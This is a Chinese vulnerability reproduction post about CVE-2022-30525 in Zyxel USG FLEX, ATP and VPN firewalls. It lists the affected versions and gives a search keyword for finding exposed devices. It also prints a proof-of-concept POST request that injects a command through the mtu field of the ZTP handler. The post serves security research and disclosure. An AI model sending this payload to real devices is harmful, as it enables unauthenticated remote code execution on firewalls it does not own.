Rapid7 发现并报告了一个漏洞,该漏洞影响支持零接触配置 (ZTP) 的 Zyxel 防火墙,其中包括 ATP 系列、VPN 系列和USG FLEX 系列(包括 USG20-VPN 和 USG20W-VPN)。该漏洞标识为 CVE-2022-30525,允许未经身份验证的远程攻击者以nobody受影响设备上的用户身份执行任意代码。
漏洞影响
型号 |
版本 |
USG FLEX 100、100W、200、500、700 |
ZLD5.00 至 ZLD5.21 补丁 |
USG20-VPN、USG20W-VP |
ZLD5.10 至 ZLD5.21 补丁 |
ATP 100、200、500、700、80 |
ZLD5.10 至 ZLD5.21 补丁 |
漏洞描述
受影响的模型容易受到通过管理 HTTP 接口进行未经身份验证的远程命令注入的攻击。命令以nobody用户身份执行。
关键词
title=”USG FLEX”
复现
检测目标存在漏洞
手工验证,访问目标并抓包
更改提交方式和参数
成功ping通DNSLog
poc:
POST /ztp/cgi-bin/handler
{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":";{dnslog};","data":"hi"}
参考链接
https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
https://github.com/M4fiaB0y/CVE-2022-30525
END
• 往期精选
下方点击关注发现更多精彩
原文始发于微信公众号(银河护卫队super):漏洞复现 | Zyxel USG FLEX远程命令执行漏洞(CVE-2022-30525)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论